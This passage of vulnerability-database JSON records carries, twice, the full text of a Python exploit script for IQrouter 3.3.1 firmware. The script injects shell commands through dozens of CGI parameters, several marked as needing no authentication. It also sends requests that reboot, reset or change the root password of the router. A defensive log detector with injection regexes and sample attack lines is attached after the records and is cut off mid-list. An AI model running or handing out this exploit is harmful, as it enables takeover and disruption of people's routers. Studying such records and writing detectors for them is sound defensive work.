"PARTIAL", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 8.5, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11963", "CVE-2020-11964", "CVE-2020-11966", "CVE-2020-11967", "CVE-2020-11968"], "modified": "2020-04-21T00:00:00", "id": "EDB-ID:48358", "href": "https://www.exploit-db.com/exploits/48358", "sourceData": "# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code 
Execution\r\n# Date: 2020-04-21\r\n# Exploit Author: drakylar\r\n# Vendor Homepage: https://evenroute.com/\r\n# Software Link: https://evenroute.com/iqrouter\r\n# Version: IQrouter firmware up to 3.3.1\r\n# Tested on: IQrouter firmware 3.3.1\r\n# CVE : N/A \r\n\r\n#!/usr/bin/env python3\r\nimport argparse\r\nfrom sys import argv, exit\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print(\"Install requests lib! pip3 install requests\")\r\n\r\n\r\nprint(\"\"\"\r\n#######################################################################\r\n# IQrouter multiple RCE and other vulnerabilities #\r\n# by drakylar (Shaposhnikov Ilya) #\r\n# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 #\r\n# CVE-2020-11967 CVE-2020-11968 #\r\n#######################################################################\r\n\"\"\")\r\n\r\n\r\nrce_setup = [\r\n [\r\n \"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'\",\r\n \"RCE /vlanTag (vlan_tag param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'\",\r\n \"RCE /verify_wifi (wifi_conflict param). 
Need hide_wifi_config != true\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2\",\r\n \"RCE /screen9 (s2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2\",\r\n \"RCE /screen9 (s1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'\",\r\n \"RCE /screen9 (p2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2\",\r\n \"RCE /screen9 (p1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen4?save_isp='`{}`\",\r\n \"RCE /screen4 (save_isp param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'\",\r\n \"RCE /screen2 set_wan_modem_interfaces param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'\",\r\n \"RCE /screen2 find_ip_address_conflict param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen10?set_security_question='`{}`'\",\r\n \"RCE /screen10 (set_security_question param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1\",\r\n \"RCE /screen10 (set_security_answer param)\"],\r\n [\r\n \"/cgi-bin/luci/er/screen1?zonename='`{}`'\",\r\n \"RCE /screen1 (zonename param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/register?email=`{}`\",\r\n \"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)\"\r\n ]\r\n]\r\n\r\nrce_any = [\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1\",\r\n \"RCE /wifi (s2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (s1 param)\"\r\n ],\r\n [\r\n 
\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'\",\r\n \"RCE /wifi (p2 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4\",\r\n \"RCE /wifi (p1 param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guestwifi_5g_ssid param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guestwifi_2g_ssid param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\",\r\n \"RCE /wifi (guest_key param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7\",\r\n \"RCE /wifi (enable_guestwifi param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123\",\r\n \"RCE /screen11.1 (email param)\"\r\n ],\r\n [\r\n 
\"/cgi-bin/luci/er/reboot_link?link='`{}`'\",\r\n \"RCE /reboot_link (link param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/\",\r\n \"RCE /diag_wifi (htm5ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/\",\r\n \"RCE /diag_wifi (htm2ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/\",\r\n \"RCE /diag_wifi (c5ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/\",\r\n \"RCE /diag_wifi (c2ghz param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/\",\r\n \"RCE /diag_set_static_wan (static_ip param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/\",\r\n \"RCE /diag_set_static_wan (net_mask param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/\",\r\n \"RCE /diag_set_static_wan (gateway param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/\",\r\n \"RCE /diag_set_static_wan (dns param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/\",\r\n \"RCE /diag_set_static_modem (static_ip param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/\",\r\n \"RCE /diag_set_static_modem (net_mask param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/\",\r\n \"RCE /diag_set_static_modem (gateway param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/\",\r\n \"RCE /diag_set_device_name_and_sync (device_name param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/\",\r\n \"RCE /diag_set_device_name (device_name param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/\",\r\n \"RCE /diag_pppoe_update (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoe_update (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/\",\r\n \"RCE /diag_pppoe (wan_username param)\"\r\n ],\r\n 
[\r\n \"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoe (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/\",\r\n \"RCE /diag_pppoa_update (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoa_update (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/\",\r\n \"RCE /diag_pppoa (wan_username param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/\",\r\n \"RCE /diag_pppoa (wan_password param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/advanced_link?link='`{}`'\",\r\n \"RCE /advanced_link (link param)\"\r\n ]\r\n\r\n]\r\n\r\nadvanced_payloads = [\r\n [\r\n \"/cgi-bin/luci/er/reboot_link?reboot=1\",\r\n \"Reboot IQrouter (/reboot_link reboot param))\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen2?reboot=1\",\r\n \"Reboot IQrouter (/screen2 reboot param))\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/index?reset_config=1\",\r\n \"Reset IQrouter (/index reset_config param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/screen7?upgrade=1\",\r\n \"Upgrade IQrouter (/screen7 upgrade param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/vlanTag?restart_network=1\",\r\n \"Restart network (/vlanTag restart_network param)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_iperf_cmd/start\",\r\n \"Start iperf script (/diag_iperf_cmd/start)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_iperf_cmd/stop\",\r\n \"Stop iperf script (/diag_iperf_cmd/stop)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/get_syslog\",\r\n \"Router setup info log (/get_syslog)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/diag_set_password/c00lpasswd/\",\r\n \"Change root password to c00lpasswd (can change in code)\"\r\n ],\r\n [\r\n \"/cgi-bin/luci/er/reset_password/\",\r\n \"Change root password to 'changeme' (static)\"\r\n ]\r\n]\r\n\r\n\r\ndef print_payloads():\r\n print('#' * 30)\r\n print(\"Payloads list\")\r\n num = 1\r\n print('######################### RCE without auth 
########################')\r\n for payload in rce_any:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n print(\r\n '############### RCE (router need to be in setup mode) ###############')\r\n for payload in rce_setup:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n print(\r\n '######################### Advanced payloads #########################')\r\n for payload in advanced_payloads:\r\n print(\"{} - {}\".format(num, payload[1]))\r\n num += 1\r\n\r\n\r\nparser = argparse.ArgumentParser(description=\"IQrouter multiple RCE\")\r\nparser.add_argument('--host', help='Host', type=str)\r\nparser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int)\r\nparser.add_argument('-n', '--num', help='Payload number',\r\n default=0, type=int)\r\nparser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)',\r\n default=\"pwd\", type=str)\r\nparser.add_argument('--protocol', help='Protocol (http/https)',\r\n default=\"http\", type=str)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\ndef main():\r\n print(\"\")\r\n full_payload_list = rce_setup + rce_any + advanced_payloads\r\n payloads_amount = len(full_payload_list)\r\n try:\r\n hostname = args.host\r\n port = args.port\r\n payload_num = int(args.num)\r\n bash_cmd = args.cmd\r\n protocol = args.protocol\r\n\r\n if payload_num < 1 or payload_num > payloads_amount:\r\n print(\"Error with payload number!\")\r\n raise IndexError\r\n if port < 0 or port > 65535:\r\n print(\"Error with port number\")\r\n raise IndexError\r\n if protocol not in ['http', 'https']:\r\n print(\"Error with protocol name\")\r\n raise IndexError\r\n\r\n current_payload = full_payload_list[payload_num - 1]\r\n print(\"Payload: {}\".format(current_payload[1]))\r\n print(\"Host: {}\".format(hostname))\r\n print(\"Port: {}\".format(port))\r\n print(\"Protocol: {}\".format(protocol))\r\n print(\"Command: {}\".format(bash_cmd))\r\n\r\n full_url = \"{}://{}:{}{}\".format(protocol, hostname, 
port,\r\n current_payload[0].format(bash_cmd))\r\n print(\"Built URL: {}\".format(full_url))\r\n\r\n r = requests.get(full_url)\r\n print(\"Status code: {}\".format(r.status_code))\r\n return\r\n except IndexError:\r\n parser.print_help()\r\n print_payloads()\r\n exit(1)\r\n\r\n\r\nif __name__ == '__main__':\r\n print(\r\n \"\\n\\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.\")\r\n exit(main())", "sourceHref": "https://www.exploit-db.com/download/48358", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "packetstorm": [{"lastseen": "2020-04-25T08:10:07", "description": "", "cvss3": {}, "published": "2020-04-21T00:00:00", "type": "packetstorm", "title": "IQrouter 3.3.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-11968", "CVE-2020-11966", "CVE-2020-11963", "CVE-2020-11964", "CVE-2020-11967"], "modified": "2020-04-21T00:00:00", "id": "PACKETSTORM:157300", "href": "https://packetstormsecurity.com/files/157300/IQrouter-3.3.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution \n# Date: 2020-04-21 \n# Exploit Author: drakylar \n# Vendor Homepage: https://evenroute.com/ \n# Software Link: https://evenroute.com/iqrouter \n# Version: IQrouter firmware up to 3.3.1 \n# Tested on: IQrouter firmware 3.3.1 \n# CVE : N/A \n \n#!/usr/bin/env python3 \nimport argparse \nfrom sys import argv, exit \n \ntry: \nimport requests \nexcept ImportError: \nprint(\"Install requests lib! 
pip3 install requests\") \n \n \nprint(\"\"\" \n####################################################################### \n# IQrouter multiple RCE and other vulnerabilities # \n# by drakylar (Shaposhnikov Ilya) # \n# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # \n# CVE-2020-11967 CVE-2020-11968 # \n####################################################################### \n\"\"\") \n \n \nrce_setup = [ \n[ \n\"/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'\", \n\"RCE /vlanTag (vlan_tag param)\" \n], \n[ \n\"/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'\", \n\"RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2\", \n\"RCE /screen9 (s2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2\", \n\"RCE /screen9 (s1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'\", \n\"RCE /screen9 (p2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2\", \n\"RCE /screen9 (p1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen4?save_isp='`{}`\", \n\"RCE /screen4 (save_isp param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'\", \n\"RCE /screen2 set_wan_modem_interfaces param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'\", \n\"RCE /screen2 find_ip_address_conflict param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen10?set_security_question='`{}`'\", \n\"RCE /screen10 (set_security_question param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1\", \n\"RCE /screen10 (set_security_answer param)\"], \n[ \n\"/cgi-bin/luci/er/screen1?zonename='`{}`'\", \n\"RCE /screen1 (zonename param)\" \n], \n[ \n\"/cgi-bin/luci/er/register?email=`{}`\", \n\"RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)\" \n] \n] \n \nrce_any = [ \n[ 
\n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1\", \n\"RCE /wifi (s2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7\", \n\"RCE /wifi (s1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'\", \n\"RCE /wifi (p2 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4\", \n\"RCE /wifi (p1 param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guestwifi_5g_ssid param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guestwifi_2g_ssid param)\" \n], \n[ 
\n\"/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7\", \n\"RCE /wifi (guest_key param)\" \n], \n[ \n\"/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7\", \n\"RCE /wifi (enable_guestwifi param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen11.1?email=`{}`&register=123&uilog=123&bg=123\", \n\"RCE /screen11.1 (email param)\" \n], \n[ \n\"/cgi-bin/luci/er/reboot_link?link='`{}`'\", \n\"RCE /reboot_link (link param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/\", \n\"RCE /diag_wifi (htm5ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/\", \n\"RCE /diag_wifi (htm2ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/\", \n\"RCE /diag_wifi (c5ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/\", \n\"RCE /diag_wifi (c2ghz param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/\", \n\"RCE /diag_set_static_wan (static_ip param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/\", \n\"RCE /diag_set_static_wan (net_mask param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/\", \n\"RCE /diag_set_static_wan (gateway param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/\", \n\"RCE /diag_set_static_wan (dns param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/\", \n\"RCE /diag_set_static_modem (static_ip param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/\", \n\"RCE /diag_set_static_modem (net_mask param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/\", \n\"RCE /diag_set_static_modem (gateway param)\" \n], 
\n[ \n\"/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/\", \n\"RCE /diag_set_device_name_and_sync (device_name param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_device_name/'`{}`'/\", \n\"RCE /diag_set_device_name (device_name param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/\", \n\"RCE /diag_pppoe_update (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoe_update (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/\", \n\"RCE /diag_pppoe (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoe (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/\", \n\"RCE /diag_pppoa_update (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoa_update (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/\", \n\"RCE /diag_pppoa (wan_username param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/\", \n\"RCE /diag_pppoa (wan_password param)\" \n], \n[ \n\"/cgi-bin/luci/er/advanced_link?link='`{}`'\", \n\"RCE /advanced_link (link param)\" \n] \n \n] \n \nadvanced_payloads = [ \n[ \n\"/cgi-bin/luci/er/reboot_link?reboot=1\", \n\"Reboot IQrouter (/reboot_link reboot param))\" \n], \n[ \n\"/cgi-bin/luci/er/screen2?reboot=1\", \n\"Reboot IQrouter (/screen2 reboot param))\" \n], \n[ \n\"/cgi-bin/luci/er/index?reset_config=1\", \n\"Reset IQrouter (/index reset_config param)\" \n], \n[ \n\"/cgi-bin/luci/er/screen7?upgrade=1\", \n\"Upgrade IQrouter (/screen7 upgrade param)\" \n], \n[ \n\"/cgi-bin/luci/er/vlanTag?restart_network=1\", \n\"Restart network (/vlanTag restart_network param)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_iperf_cmd/start\", \n\"Start iperf script (/diag_iperf_cmd/start)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_iperf_cmd/stop\", \n\"Stop iperf script (/diag_iperf_cmd/stop)\" \n], \n[ 
\n\"/cgi-bin/luci/er/get_syslog\", \n\"Router setup info log (/get_syslog)\" \n], \n[ \n\"/cgi-bin/luci/er/diag_set_password/c00lpasswd/\", \n\"Change root password to c00lpasswd (can change in code)\" \n], \n[ \n\"/cgi-bin/luci/er/reset_password/\", \n\"Change root password to 'changeme' (static)\" \n] \n] \n \n \ndef print_payloads(): \nprint('#' * 30) \nprint(\"Payloads list\") \nnum = 1 \nprint('######################### RCE without auth ########################') \nfor payload in rce_any: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \nprint( \n'############### RCE (router need to be in setup mode) ###############') \nfor payload in rce_setup: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \nprint( \n'######################### Advanced payloads #########################') \nfor payload in advanced_payloads: \nprint(\"{} - {}\".format(num, payload[1])) \nnum += 1 \n \n \nparser = argparse.ArgumentParser(description=\"IQrouter multiple RCE\") \nparser.add_argument('--host', help='Host', type=str) \nparser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) \nparser.add_argument('-n', '--num', help='Payload number', \ndefault=0, type=int) \nparser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', \ndefault=\"pwd\", type=str) \nparser.add_argument('--protocol', help='Protocol (http/https)', \ndefault=\"http\", type=str) \n \nargs = parser.parse_args() \n \n \ndef main(): \nprint(\"\") \nfull_payload_list = rce_setup + rce_any + advanced_payloads \npayloads_amount = len(full_payload_list) \ntry: \nhostname = args.host \nport = args.port \npayload_num = int(args.num) \nbash_cmd = args.cmd \nprotocol = args.protocol \n \nif payload_num < 1 or payload_num > payloads_amount: \nprint(\"Error with payload number!\") \nraise IndexError \nif port < 0 or port > 65535: \nprint(\"Error with port number\") \nraise IndexError \nif protocol not in ['http', 'https']: \nprint(\"Error with protocol name\") 
\nraise IndexError \n \ncurrent_payload = full_payload_list[payload_num - 1] \nprint(\"Payload: {}\".format(current_payload[1])) \nprint(\"Host: {}\".format(hostname)) \nprint(\"Port: {}\".format(port)) \nprint(\"Protocol: {}\".format(protocol)) \nprint(\"Command: {}\".format(bash_cmd)) \n \nfull_url = \"{}://{}:{}{}\".format(protocol, hostname, port, \ncurrent_payload[0].format(bash_cmd)) \nprint(\"Built URL: {}\".format(full_url)) \n \nr = requests.get(full_url) \nprint(\"Status code: {}\".format(r.status_code)) \nreturn \nexcept IndexError: \nparser.print_help() \nprint_payloads() \nexit(1) \n \n \nif __name__ == '__main__': \nprint( \n\"\\n\\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.\") \nexit(main()) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157300/iqrouter331-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}]}
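The exploit records above inject shell command substitution (the '`cmd`' shape, with ${IFS} or a tab standing in for a space) into query parameters and path segments of the /cgi-bin/luci/er/ controller. The following is an added example for this record, not the exploit author's or the vendor's code: a detector that percent-decodes each request component and flags those metacharacter shapes under the vulnerable prefix, plus the allowlist check a hardened handler should apply before a value goes anywhere near a shell. The Common Log Format layout (LOG_RE) and the sample lines in SAMPLE_LOG are assumptions constructed for the example; adapt LOG_RE to whatever the router's web server actually writes.

```python
"""Detect CVE-2020-11963-style command-injection attempts against the
IQrouter LuCI 'er' endpoints in a web-server access log.

Added example for this record; not the exploit author's or vendor's code.
The log layout (Common Log Format) and the sample lines are assumptions
constructed for the example; adapt LOG_RE to the real server's format.
"""
import re
from urllib.parse import unquote

# Every payload in the exploit on this page hits this controller prefix.
ER_PREFIX = "/cgi-bin/luci/er/"

# Shell metacharacter shapes the payloads rely on: backtick and $( )
# command substitution, ${IFS} standing in for a space, tab/newline
# (the exploit's own hint), and the usual command separators.
SHELL_META = re.compile(r"`|\$\(|\$\{?IFS\}?|;|\||&&|\t|\n")

# Allowlist a hardened handler could enforce before touching any value:
# time zones, SSIDs, hostnames and IPs fit this; ' ` $ ; | \t do not.
# Even an allowed value must be passed as its own argv element, never
# interpolated into a shell string.
ALLOWED_VALUE = re.compile(r"^[A-Za-z0-9 ._/:@+-]{0,64}$")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample log (not real traffic): one benign wizard request,
# two injection attempts shaped like the payloads on this page, and one
# request outside the vulnerable prefix.
SAMPLE_LOG = [
    '192.168.1.10 - - [21/Apr/2020:10:00:01 +0000] "GET /cgi-bin/luci/er/screen1?zonename=Europe/Berlin HTTP/1.1" 200 512',
    '10.0.0.5 - - [21/Apr/2020:10:00:07 +0000] "GET /cgi-bin/luci/er/vlanTag?vlan_tag=%27%60id%60%27 HTTP/1.1" 200 77',
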